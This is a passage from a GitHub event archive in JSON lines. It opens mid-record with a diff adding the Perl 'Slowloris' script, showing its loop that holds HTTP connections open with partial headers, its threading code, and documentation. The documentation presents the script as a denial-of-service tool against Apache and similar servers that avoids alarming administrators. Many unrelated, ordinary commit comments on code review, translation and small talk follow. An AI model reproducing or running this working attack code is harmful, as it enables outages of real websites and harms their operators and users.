ACK\r\n +                    }\r\n +                    else {\r\n +                        $working[$z] = 0;\r\n +                    }\r\n +                }\r\n +                if ( $working[$z] == 1 ) {\r\n +                    if ($cache) {\r\n +                        $rand = \"?\" . int( rand(99999999999999) );\r\n +                    }\r\n +                    else {\r\n +                        $rand = \"\";\r\n +                    }\r\n +                    my $primarypayload =\r\n +                        \"$method /$rand HTTP/1.1\\r\\n\"\r\n +                      . \"Host: $sendhost\\r\\n\"\r\n +                      . \"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\\r\\n\"\r\n +                      . \"Content-Length: 42\\r\\n\";\r\n +                    my $handle = $sock[$z];\r\n +                    if ($handle) {\r\n +                        print $handle \"$primarypayload\";\r\n +                        if ( $SIG{__WARN__} ) {\r\n +                            $working[$z] = 0;\r\n +                            close $handle;\r\n +                            $failed++;\r\n +                            $failedconnections++;\r\n +                        }\r\n +                        else {\r\n +                            $packetcount++;\r\n +                            $working[$z] = 1;\r\n +                        }\r\n +                    }\r\n +                    else {\r\n +                        $working[$z] = 0;\r\n +                        $failed++;\r\n +                        $failedconnections++;\r\n +                    }\r\n +                }\r\n +                else {\r\n +                    $working[$z] = 0;\r\n +                    $failed++;\r\n +                    $failedconnections++;\r\n +                }\r\n +            }\r\n +        }\r\n +        print \"\\t\\tSending data.\\n\";\r\n +        foreach my $z ( 1 .. $num ) {\r\n +            if ( $working[$z] == 1 ) {\r\n +                if ( $sock[$z] ) {\r\n +                    my $handle = $sock[$z];\r\n +                    if ( print $handle \"X-a: b\\r\\n\" ) {\r\n +                        $working[$z] = 1;\r\n +                        $packetcount++;\r\n +                    }\r\n +                    else {\r\n +                        $working[$z] = 0;\r\n +                        #debugging info\r\n +                        $failed++;\r\n +                        $failedconnections++;\r\n +                    }\r\n +                }\r\n +                else {\r\n +                    $working[$z] = 0;\r\n +                    #debugging info\r\n +                    $failed++;\r\n +                    $failedconnections++;\r\n +                }\r\n +            }\r\n +        }\r\n +        print\r\n +\"Current stats:\\tSlowloris has now sent $packetcount packets successfully.\\nThis thread now sleeping for $timeout seconds...\\n\\n\";\r\n +        sleep($timeout);\r\n +    }\r\n +}\r\n +\r\n +sub domultithreading {\r\n +    my ($num) = @_;\r\n +    my @thrs;\r\n +    my $i                    = 0;\r\n +    my $connectionsperthread = 50;\r\n +    while ( $i < $num ) {\r\n +        $thrs[$i] =\r\n +          threads->create( \\&doconnections, $connectionsperthread, 1 );\r\n +        $i += $connectionsperthread;\r\n +    }\r\n +    my @threadslist = threads->list();\r\n +    while ( $#threadslist > 0 ) {\r\n +        $failed = 0;\r\n +    }\r\n +}\r\n +\r\n +__END__\r\n +\r\n +=head1 TITLE\r\n +\r\n +Slowloris by llaera\r\n +\r\n +=head1 VERSION\r\n +\r\n +Version 1.0 Stable\r\n +\r\n +=head1 DATE\r\n +\r\n +02/11/2013\r\n +\r\n +=head1 AUTHOR\r\n +\r\n +Laera Loris llaera@outlook.com\r\n +\r\n +=head1 ABSTRACT\r\n +\r\n +Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service.  It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively.  It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.\r\n +\r\n +=head1 AFFECTS\r\n +\r\n +Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, others...?\r\n +\r\n +=head1 NOT AFFECTED\r\n +\r\n +IIS6.0, IIS7.0, lighttpd, nginx, Cherokee, Squid, others...?"}},"created_at":"2016-09-18T11:48:31Z"}
{"id":"4579790440","type":"CommitCommentEvent","actor":{"login":"giuseppeg"},"repo":{"name":"TooTallNate/hyperlinks"},"payload":{"comment":{"id":19070395,"position":null,"line":null,"path":null,"commit_id":"709c501cfe90fee6b328d35bcffd3ecf18049dc9","created_at":"2016-09-18T11:49:18Z","updated_at":"2016-09-18T11:49:18Z","body":"this is awesome @TooTallNate ! Do you think that it would be easy to extend this functionality to local folder/files? In iTerm2 you can open local folders or files with metaKey + click."}},"created_at":"2016-09-18T11:49:18Z"}
{"id":"4579790554","type":"CommitCommentEvent","actor":{"login":"sasairc"},"repo":{"name":"844196/homebrew-Renge"},"payload":{"comment":{"id":19070396,"position":null,"line":null,"path":null,"commit_id":"2f834dee25171ae22f18ed1384d640aea7656279","created_at":"2016-09-18T11:49:23Z","updated_at":"2016-09-18T11:49:23Z","body":"@844196 \r\n:ant: :ant: :ant: :ant: :ant: :ant: :ant: :ant: :ant: :ant:"}},"created_at":"2016-09-18T11:49:23Z"}
{"id":"4579791325","type":"CommitCommentEvent","actor":{"login":"xinran1900"},"repo":{"name":"utom/sketch-measure"},"payload":{"comment":{"id":19070399,"position":null,"line":null,"path":null,"commit_id":"da593c70b718ebff632baffd987f4dfeed9920ce","created_at":"2016-09-18T11:50:02Z","updated_at":"2016-09-18T11:50:02Z","body":"Hi，您好。为什么property等都用不了了呢？"}},"created_at":"2016-09-18T11:50:02Z"}
{"id":"4579791620","type":"CommitCommentEvent","actor":{"login":"stebifan"},"repo":{"name":"Freifunk-Rhein-Sieg/api-json"},"payload":{"comment":{"id":19070400,"position":null,"line":null,"path":null,"commit_id":"1cf81eeab0f86610d3c1b33d688bc9feace8c854","created_at":"2016-09-18T11:50:15Z","updated_at":"2016-09-18T11:50:15Z","body":"#1 "}},"created_at":"2016-09-18T11:50:15Z"}
{"id":"4579792039","type":"CommitCommentEvent","actor":{"login":"MilletPu"},"repo":{"name":"MilletPu/airvis"},"payload":{"comment":{"id":19070401,"position":null,"line":null,"path":null,"commit_id":"7cc5e93b7d7ce0dbaf60abe34d6308e5a4ca2ca4","created_at":"2016-09-18T11:50:34Z","updated_at":"2016-09-18T11:50:34Z","body":"不是删除分支。"}},"created_at":"2016-09-18T11:50:34Z"}
{"id":"4579793834","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"rburkey2005/virtualagc"},"payload":{"comment":{"id":19070405,"position":null,"line":null,"path":null,"commit_id":"a644de6322271fd23da23a343b136f3e52c638fc","created_at":"2016-09-18T11:51:58Z","updated_at":"2016-09-18T11:51:58Z","body":"@thewonderidiot Plus, your other comments are right too, as I'm sure you knew.  Thanks for pointing that out; I don't know how long it might have taken me to see that.  (If I had been looking at it, which I wasn't.)"}},"created_at":"2016-09-18T11:51:58Z"}
{"id":"4579796527","type":"CommitCommentEvent","actor":{"login":"Mottie"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":19070410,"position":null,"line":null,"path":null,"commit_id":"6c73270686137b59f3575840f6040108aacdf490","created_at":"2016-09-18T11:54:07Z","updated_at":"2016-09-18T11:54:07Z","body":"I think it's pretty darn good considering it's switching from an pixelated image to a border style - my OCD thinks otherwise, but I can't let it rule my life. I can add a pixel either way and it won't ever line up. Go ahead, try it. If I'm wrong, please submit a pull request."}},"created_at":"2016-09-18T11:54:07Z"}
{"id":"4579796971","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/appstores"},"payload":{"comment":{"id":19070412,"position":null,"line":null,"path":null,"commit_id":"0fe716b274dffa0e9ae172b7c96de9bd9c214cca","created_at":"2016-09-18T11:54:26Z","updated_at":"2016-09-18T11:54:26Z","body":"@kitsunenosaraT \r\n\r\nspero di aver capito bene quella dei video HLS.\r\nhttps://en.wikipedia.org/wiki/HTTP_Live_Streaming\r\n\r\n\r\n\r\n"}},"created_at":"2016-09-18T11:54:26Z"}
{"id":"4579799712","type":"CommitCommentEvent","actor":{"login":"vijeth-aradhya"},"repo":{"name":"vijeth-aradhya/addons-server"},"payload":{"comment":{"id":19070414,"position":null,"line":null,"path":null,"commit_id":"3376b7f7450c812dc3230e911c946249c84348cd","created_at":"2016-09-18T11:56:33Z","updated_at":"2016-09-18T11:56:33Z","body":"Images after changing the file : \r\n\r\n![restyle-css-bugfix-1](https://cloud.githubusercontent.com/assets/15227565/18615447/faf333b8-7dc4-11e6-9d7f-39b62c8140b6.png)\r\n\r\n![restyle-css-bugfix-2](https://cloud.githubusercontent.com/assets/15227565/18615450/fcfb07e4-7dc4-11e6-9824-34a23aafba29.png)\r\n\r\n![view-other-versions-bugfix](https://cloud.githubusercontent.com/assets/15227565/18615451/ff381826-7dc4-11e6-819b-304c60ae6f60.png)\r\n\r\nThese are the ones I uploaded in the previous commits.\r\n\r\n\r\n"}},"created_at":"2016-09-18T11:56:33Z"}
{"id":"4579800646","type":"CommitCommentEvent","actor":{"login":"cyjthink"},"repo":{"name":"cyjthink/cyjthink.github.io"},"payload":{"comment":{"id":19070417,"position":null,"line":null,"path":null,"commit_id":"433d7bcaac84d01ef1a188e1d343bedfb95838ef","created_at":"2016-09-18T11:57:24Z","updated_at":"2016-09-18T11:57:24Z","body":"test"}},"created_at":"2016-09-18T11:57:24Z"}
{"id":"4579802242","type":"CommitCommentEvent","actor":{"login":"Xiao187"},"repo":{"name":"zkzy/Cto"},"payload":{"comment":{"id":19070420,"position":null,"line":null,"path":null,"commit_id":"480036677f2222d0a8209878b342b5ab27608ff1","created_at":"2016-09-18T11:58:37Z","updated_at":"2016-09-18T11:58:37Z","body":"好"}},"created_at":"2016-09-18T11:58:37Z"}
{"id":"4579804549","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070421,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T12:00:20Z","updated_at":"2016-09-18T12:00:20Z","body":"Anyway. Why did you change the name of the Android.mk in the root of the hardware tree to sprd.mk? Is not it make it more complicated and require another explicit makefile inclusion?"}},"created_at":"2016-09-18T12:00:20Z"}
{"id":"4579805512","type":"CommitCommentEvent","actor":{"login":"CheckYourScreen"},"repo":{"name":"NachiketNamjoshi/BlackReactor_onyx"},"payload":{"comment":{"id":19070422,"position":4,"line":407,"path":"net/bluetooth/hci_conn.c","commit_id":"336e979af999c60f24148b8c611f8211e766c422","created_at":"2016-09-18T12:01:04Z","updated_at":"2016-09-18T12:01:04Z","body":"https://github.com/CheckYourScreen/Arsenic.Kernel/commit/95af5beb11928823e6b11d61c64570836e330693\r\n\r\nTeh Lulz xD"}},"created_at":"2016-09-18T12:01:04Z"}
{"id":"4579806605","type":"CommitCommentEvent","actor":{"login":"ThePhD"},"repo":{"name":"ThePhD/lua-bench"},"payload":{"comment":{"id":19070424,"position":null,"line":null,"path":null,"commit_id":"a7925e830a7bb3e7ce6d2d4ca9c5cd5b3ddbc048","created_at":"2016-09-18T12:01:56Z","updated_at":"2016-09-18T12:01:56Z","body":"I only used Luabind as an example. Lua, itself, expects the syntax `obj.variable = 20` to modify a userdata-specific / table-specific variable. It does not access a \"static\" property on the table; it access a table-local one. There is a lot of code written in plain, regular Lua that expects that to work out: if you can't make an _arbitrary data type_ fit that specification, then someone would have to refactor that code. That's an incredible hard task to do for larger codebases.\r\n\r\nI do need to be more specific about what it means, but I have limited space among other things to write this and I'm doing this all solo. It's a bit hard to attend to everything and get it perfectly right.\r\n\r\nFinally, Sol does support Luabind (and other library's) `local v = my_class( 50, {} );` data for construction a usertype, because a Luabind user from the past came and requested the feature (to interop better with their code), and I provided it ASAP and it's now apart of the library: http://sol2.readthedocs.io/en/latest/api/usertype.html#usertype-constructor-options"}},"created_at":"2016-09-18T12:01:56Z"}
{"id":"4579808339","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070425,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T12:02:30Z","updated_at":"2016-09-18T12:02:30Z","body":"I would then it call it from device tree.\nEither way it was not getting called and we had to define direct packages\nin device tree to call it.\n\nDuh lots of reverts to do :|\n\nOn Sep 18, 2016 5:30 PM, \"Quang Ngô\" <notifications@github.com> wrote:\n\n> Anyway. Why did you change the name of the Android.mk in the root of the\n> hardware tree to sprd.mk? Is not it make it more complicated and require\n> another explicit makefile inclusion?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TeamButter/android_hardware_samsung_sprd-common/commit/1b02e6071fad853a96e4c6cc5343ed0a231a9e9d#commitcomment-19070421>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKM-vXbeG6A6zLnIqf0xJIbY-E_b_Jywks5qrSfVgaJpZM4J_4Iw>\n> .\n>\n"}},"created_at":"2016-09-18T12:02:30Z"}
{"id":"4579809257","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/appstores"},"payload":{"comment":{"id":19070426,"position":10,"line":10,"path":"it/whatsnew/whatsnew_android_50_beta.lang","commit_id":"0fe716b274dffa0e9ae172b7c96de9bd9c214cca","created_at":"2016-09-18T12:03:14Z","updated_at":"2016-09-18T12:03:14Z","body":"\"Riproduzione degli stream video HLS attraverso un player sovrapposto\"?"}},"created_at":"2016-09-18T12:03:14Z"}
{"id":"4579809780","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"staticfloat/homebrew-julia"},"payload":{"comment":{"id":19070429,"position":null,"line":null,"path":null,"commit_id":"e61f95314e8247ccbabf1846bf6b2e268d633361","created_at":"2016-09-18T12:03:40Z","updated_at":"2016-09-18T12:03:40Z","body":"this isn't necessarily true if you have binaries of libgit2 etc, but doesn't hurt much either"}},"created_at":"2016-09-18T12:03:40Z"}
{"id":"4579810243","type":"CommitCommentEvent","actor":{"login":"jstockwin"},"repo":{"name":"jakestockwin-co-uk/deployment"},"payload":{"comment":{"id":19070430,"position":null,"line":null,"path":null,"commit_id":"e4f857bb9d906f4286d8a1cc2d113a6b562e84e7","created_at":"2016-09-18T12:04:03Z","updated_at":"2016-09-18T12:04:03Z","body":"😆 "}},"created_at":"2016-09-18T12:04:03Z"}
{"id":"4579810257","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/appstores"},"payload":{"comment":{"id":19070431,"position":5,"line":6,"path":"it/whatsnew/whatsnew_android_50_beta.lang","commit_id":"0fe716b274dffa0e9ae172b7c96de9bd9c214cca","created_at":"2016-09-18T12:04:04Z","updated_at":"2016-09-18T12:04:04Z","body":"Magari semplificarlo con \"visualizzando\" invece di \"riunendo\"?"}},"created_at":"2016-09-18T12:04:04Z"}
{"id":"4579810811","type":"CommitCommentEvent","actor":{"login":"mpvader"},"repo":{"name":"victronenergy/venus"},"payload":{"comment":{"id":19070432,"position":26,"line":25,"path":"Makefile","commit_id":"b84230514403166b28479b085a1c528ba066b2c6","created_at":"2016-09-18T12:04:30Z","updated_at":"2016-09-18T12:04:30Z","body":"Replace checkout with config."}},"created_at":"2016-09-18T12:04:30Z"}
{"id":"4579811073","type":"CommitCommentEvent","actor":{"login":"SammysHP"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":19070433,"position":null,"line":null,"path":null,"commit_id":"7559115d3c496d341045e27e5b1000d7d4a50877","created_at":"2016-09-18T12:04:41Z","updated_at":"2016-09-18T12:04:41Z","body":"Do you think it is worth to open a feature request for \"load more caches\"?"}},"created_at":"2016-09-18T12:04:41Z"}
{"id":"4579813444","type":"CommitCommentEvent","actor":{"login":"yt7169"},"repo":{"name":"quickcoin-2016/QuickCoin"},"payload":{"comment":{"id":19070437,"position":null,"line":null,"path":null,"commit_id":"1a388211671b868cdfe1a9fd375bbd2c39009c3a","created_at":"2016-09-18T12:06:24Z","updated_at":"2016-09-18T12:06:24Z","body":"yy"}},"created_at":"2016-09-18T12:06:24Z"}
{"id":"4579813962","type":"CommitCommentEvent","actor":{"login":"cravay"},"repo":{"name":"motivationsbanner/client"},"payload":{"comment":{"id":19070439,"position":null,"line":null,"path":null,"commit_id":"83ad06311fc7d2335d12e36e70f824d602d61751","created_at":"2016-09-18T12:06:49Z","updated_at":"2016-09-18T12:06:49Z","body":"Hallo Tim"}},"created_at":"2016-09-18T12:06:49Z"}
{"id":"4579816552","type":"CommitCommentEvent","actor":{"login":"xbony2"},"repo":{"name":"Ellpeck/ActuallyAdditions"},"payload":{"comment":{"id":19070441,"position":null,"line":null,"path":null,"commit_id":"f89196a701bf9d424b99c0e17ff001b68043ff2b","created_at":"2016-09-18T12:08:53Z","updated_at":"2016-09-18T12:08:53Z","body":"Cool :)"}},"created_at":"2016-09-18T12:08:53Z"}
{"id":"4579818588","type":"CommitCommentEvent","actor":{"login":"kvz"},"repo":{"name":"kvz/frey"},"payload":{"comment":{"id":19070442,"position":null,"line":null,"path":null,"commit_id":"3e4fea75c7fbfb619ccdda55280aab4a2bfde2ff","created_at":"2016-09-18T12:10:15Z","updated_at":"2016-09-18T12:10:15Z","body":"Alright updated - thanks!"}},"created_at":"2016-09-18T12:10:15Z"}
{"id":"4579819886","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"betaflight/betaflight-configurator"},"payload":{"comment":{"id":19070443,"position":null,"line":null,"path":null,"commit_id":"f3bfb085f8dd798a41f4de05679f720511781cfc","created_at":"2016-09-18T12:11:19Z","updated_at":"2016-09-18T12:11:19Z","body":"https://github.com/Mulder8472/max7456-charwizard\r\nhttps://github.com/ascended/MAX7456FontEditor\r\nhttp://www.rcgroups.com/forums/showthread.php?t=1830845\r\n\r\nNext time try Google first..."}},"created_at":"2016-09-18T12:11:19Z"}
{"id":"4579820710","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070444,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T12:11:55Z","updated_at":"2016-09-18T12:11:55Z","body":">  define direct packages\r\nIs not it the way it should work? We should define package names that we use in our device tree! Our hardware tree just define package names to the build system so that we can use it in our device tree. They are not build automatically (unless with some special tag definition)."}},"created_at":"2016-09-18T12:11:55Z"}
{"id":"4579822194","type":"CommitCommentEvent","actor":{"login":"targos"},"repo":{"name":"NPellet/jsGraph"},"payload":{"comment":{"id":19070446,"position":null,"line":null,"path":null,"commit_id":"47b759cb722d78cd6fd7f4cd6f6a6e9403b32e79","created_at":"2016-09-18T12:13:05Z","updated_at":"2016-09-18T12:13:05Z","body":"You can use ES6 Symbol instead of empty objects for the constants"}},"created_at":"2016-09-18T12:13:05Z"}
{"id":"4579822745","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070447,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T12:13:31Z","updated_at":"2016-09-18T12:13:31Z","body":"Yeah i thought it would, automatically.\n\nOn Sep 18, 2016 5:41 PM, \"Quang Ngô\" <notifications@github.com> wrote:\n\n> define direct packages\n> Is not it the way it should work? We should define package names that we\n> use in our device tree! Our hardware tree just define package names to the\n> build system so that we can use it in our device tree. They are not build\n> automatically (unless with some special tag definition).\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/TeamButter/android_hardware_samsung_sprd-common/commit/1b02e6071fad853a96e4c6cc5343ed0a231a9e9d#commitcomment-19070444>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AKM-vcpQ7z-mdZRS-RbDhBK1XI-gE6kGks5qrSqMgaJpZM4J_4Iw>\n> .\n>\n"}},"created_at":"2016-09-18T12:13:31Z"}
{"id":"4579823444","type":"CommitCommentEvent","actor":{"login":"stefansaraev"},"repo":{"name":"OpenELEC/OpenELEC.tv"},"payload":{"comment":{"id":19070448,"position":17,"line":22,"path":"packages/mediacenter/kodi/patches/kodi-100.09-use-a-wrapper-to-setup-systemd-services.patch","commit_id":"609d90ff5793c6f352bb5b0ce00a2d5388952bed","created_at":"2016-09-18T12:14:06Z","updated_at":"2016-09-18T12:14:06Z","body":":)"}},"created_at":"2016-09-18T12:14:06Z"}
{"id":"4579824179","type":"CommitCommentEvent","actor":{"login":"shashwat-vik"},"repo":{"name":"shashwat-vik/scrap-preprocessor"},"payload":{"comment":{"id":19070450,"position":null,"line":null,"path":null,"commit_id":"7faa88091bb4454c83cbd31688ee662f8d354e3e","created_at":"2016-09-18T12:14:40Z","updated_at":"2016-09-18T12:14:40Z","body":"**## Reason why sniffer is not used**\r\n\r\nThe irregularity is in the Record 26 for the column ‘**Details**’ in the file ‘**sample_big.csv**’. This record starts with a double quote.\r\nAnd this irregularity will not be an irregularity if the default dialect for the _csv_ would be Excel. Because the raw _csv_ file rightly places this with this, **“””**. \r\n\r\nBut the program is not using the excel Dialect, because we are using the sniffer to automatically form a Dialect Container.\r\n\r\nSo if you try to find what the **csv.sniffer** concluded for the container, you will get what went wrong. Here’s the breakdown:\r\n           1) **Dialect.doublequote** is _‘**False**_’\r\n           2) **Dialect.escapechar** is ‘_**None**_’\r\n\r\nThus the reader will overlook the importance of  “””, which will work perfectly with excel. And as the **escapechar** is **_None_**, it won’t consider this a special case.\r\n\r\nFixed #29"}},"created_at":"2016-09-18T12:14:40Z"}
{"id":"4579826120","type":"CommitCommentEvent","actor":{"login":"dmaclip"},"repo":{"name":"arslancb/clipbucket"},"payload":{"comment":{"id":19070452,"position":null,"line":null,"path":null,"commit_id":"4e0b0453e873d1dd54236d9b7636ab7fc7c0d35d","created_at":"2016-09-18T12:16:12Z","updated_at":"2016-09-18T12:16:12Z","body":"fix does not work. fresh install on test domain items still deleted"}},"created_at":"2016-09-18T12:16:12Z"}
{"id":"4579826421","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/appstores"},"payload":{"comment":{"id":19070454,"position":10,"line":10,"path":"it/whatsnew/whatsnew_android_50_beta.lang","commit_id":"0fe716b274dffa0e9ae172b7c96de9bd9c214cca","created_at":"2016-09-18T12:16:26Z","updated_at":"2016-09-18T12:16:26Z","body":"Grazie Francesco, corretto. Commit 6c9de083f06af24a34b700470879a3466c769fca\n\n"}},"created_at":"2016-09-18T12:16:26Z"}
{"id":"4579829223","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070456,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T12:18:36Z","updated_at":"2016-09-18T12:18:36Z","body":"If it would, your out directory would be flooded by QCOM's modules :D"}},"created_at":"2016-09-18T12:18:36Z"}
{"id":"4579829487","type":"CommitCommentEvent","actor":{"login":"sunsettrack4"},"repo":{"name":"sunsettrack4/android_kernel_oneplus_msm8996"},"payload":{"comment":{"id":19070457,"position":null,"line":null,"path":null,"commit_id":"fd41769d38fc211dd850e47a2b1b69a8137a058e","created_at":"2016-09-18T12:18:49Z","updated_at":"2016-09-18T12:18:49Z","body":"+ rename kernel version\r\n+ set zzmoove gov + zen i/o scheduler to default"}},"created_at":"2016-09-18T12:18:49Z"}
{"id":"4579830558","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070460,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T12:19:40Z","updated_at":"2016-09-18T12:19:40Z","body":"Lel, reverted it. https://github.com/TeamButter/android_hardware_samsung_sprd-common/commit/8e08eb9b5dba1614221d82ae582270d77dfc3a78\r\n\r\nNow need to check the conflict."}},"created_at":"2016-09-18T12:19:40Z"}
{"id":"4579831407","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070462,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T12:20:15Z","updated_at":"2016-09-18T12:20:15Z","body":"And add what you want to your device tree!"}},"created_at":"2016-09-18T12:20:15Z"}
{"id":"4579832178","type":"CommitCommentEvent","actor":{"login":"YORIFUMI-HIGA"},"repo":{"name":"YORIFUMI-HIGA/mygit"},"payload":{"comment":{"id":19070463,"position":null,"line":null,"path":null,"commit_id":"7a7eca3890dc108e0bce246aaa19ae497873ca38","created_at":"2016-09-18T12:20:51Z","updated_at":"2016-09-18T12:20:51Z","body":"テスト"}},"created_at":"2016-09-18T12:20:51Z"}
{"id":"4579834433","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"TeamButter/android_hardware_samsung_sprd-common"},"payload":{"comment":{"id":19070464,"position":null,"line":null,"path":null,"commit_id":"1b02e6071fad853a96e4c6cc5343ed0a231a9e9d","created_at":"2016-09-18T12:22:41Z","updated_at":"2016-09-18T12:22:41Z","body":"yep\r\nhttps://github.com/TeamButter/android_device_samsung_sprd-common/commit/dc1fe29679000bae65af238dea4cdadd097bbbbe\r\nhttps://github.com/TeamButter/android_device_samsung_sprd-common/commit/a6646366458af125219027a3b8822b43325ff507\r\nhttps://github.com/TeamButter/android_device_samsung_sprd-common/commit/fb960afc059fae50c6e0b6df8a7168a45976a85d"}},"created_at":"2016-09-18T12:22:41Z"}
{"id":"4579835915","type":"CommitCommentEvent","actor":{"login":"marauderlabs"},"repo":{"name":"manojmj92/subtitle-downloader"},"payload":{"comment":{"id":19070465,"position":null,"line":null,"path":null,"commit_id":"21fbe3e3a436dc1e232698b94e3c799365728149","created_at":"2016-09-18T12:23:51Z","updated_at":"2016-09-18T12:23:51Z","body":"@malikjozane This is already discussed here and is an open issue: #25 "}},"created_at":"2016-09-18T12:23:51Z"}
{"id":"4579837360","type":"CommitCommentEvent","actor":{"login":"shashwat-vik"},"repo":{"name":"shashwat-vik/scrap-preprocessor"},"payload":{"comment":{"id":19070467,"position":null,"line":null,"path":null,"commit_id":"fa4ab4250cd1c8419b462bfc4f75a13d89866ec6","created_at":"2016-09-18T12:24:59Z","updated_at":"2016-09-18T12:24:59Z","body":"**Used .encode() to convert into text**\r\n\r\nFixed #28"}},"created_at":"2016-09-18T12:24:59Z"}
{"id":"4579839113","type":"CommitCommentEvent","actor":{"login":"seungwonpark"},"repo":{"name":"seungwonpark/latex3.github.io"},"payload":{"comment":{"id":19070469,"position":null,"line":null,"path":null,"commit_id":"caaca19437e5f94f4a69638f192544a2b252d8ba","created_at":"2016-09-18T12:26:17Z","updated_at":"2016-09-18T12:26:17Z","body":"잘못올렸다 ㅋㅋㅋ `_config.yml`을 안 고쳤었음. 내일 다시 올려야지"}},"created_at":"2016-09-18T12:26:17Z"}
{"id":"4579842604","type":"CommitCommentEvent","actor":{"login":"villamarinella"},"repo":{"name":"ctownsen357/geopy"},"payload":{"comment":{"id":19070472,"position":null,"line":null,"path":null,"commit_id":"8ecfe4a1afad21bd9a8ac838cd3aa3dc6f7f32a1","created_at":"2016-09-18T12:28:46Z","updated_at":"2016-09-18T12:28:46Z","body":"It only work in USA?\r\nworthless"}},"created_at":"2016-09-18T12:28:46Z"}
{"id":"4579843955","type":"CommitCommentEvent","actor":{"login":"hedinne"},"repo":{"name":"ueno-llc/starter-kit"},"payload":{"comment":{"id":19070474,"position":null,"line":null,"path":null,"commit_id":"398a6af7f421e8e74f5d7a075a2f6ff22ee9d3e3","created_at":"2016-09-18T12:29:49Z","updated_at":"2016-09-18T12:29:49Z","body":"http://www.outlinenone.com ... just sayin'"}},"created_at":"2016-09-18T12:29:49Z"}
{"id":"4579845336","type":"CommitCommentEvent","actor":{"login":"awkwardbunny"},"repo":{"name":"fdcabb611f5e10605d933575bcac24c9/teslas-wrath"},"payload":{"comment":{"id":19070477,"position":null,"line":null,"path":null,"commit_id":"c92937d7acc2de69c772fccff89ee31f40b253fc","created_at":"2016-09-18T12:30:45Z","updated_at":"2016-09-18T12:30:45Z","body":"http://www.intel.com/content/dam/support/us/en/documents/edison/sb/edisonarduino_hg_331191007.pdf"}},"created_at":"2016-09-18T12:30:45Z"}
{"id":"4579845533","type":"CommitCommentEvent","actor":{"login":"atvcaptain"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19070479,"position":null,"line":null,"path":null,"commit_id":"f4b1f960c4cd9d220ec7c409e6d0e834e03e1fe2","created_at":"2016-09-18T12:30:54Z","updated_at":"2016-09-18T12:30:54Z","body":"please revert allready exist: https://github.com/oe-alliance/oe-alliance-core/tree/next/meta-oe/recipes-extended/astra-sm\r\n"}},"created_at":"2016-09-18T12:30:54Z"}
{"id":"4579850096","type":"CommitCommentEvent","actor":{"login":"Lightn1ng"},"repo":{"name":"Lightn1ng/arch_install_script"},"payload":{"comment":{"id":19070484,"position":null,"line":null,"path":null,"commit_id":"bcf4c5b2d12abc76803b9528a731b3931814ff9a","created_at":"2016-09-18T12:34:25Z","updated_at":"2016-09-18T12:34:25Z","body":"So you're Microsoft now?"}},"created_at":"2016-09-18T12:34:25Z"}
{"id":"4579852222","type":"CommitCommentEvent","actor":{"login":"medik"},"repo":{"name":"medik/Mat"},"payload":{"comment":{"id":19070489,"position":null,"line":null,"path":null,"commit_id":"e78512c4fcf17d55d29d9df35ba4921ba1008078","created_at":"2016-09-18T12:35:58Z","updated_at":"2016-09-18T12:35:58Z","body":"Jaha, helvete"}},"created_at":"2016-09-18T12:35:58Z"}
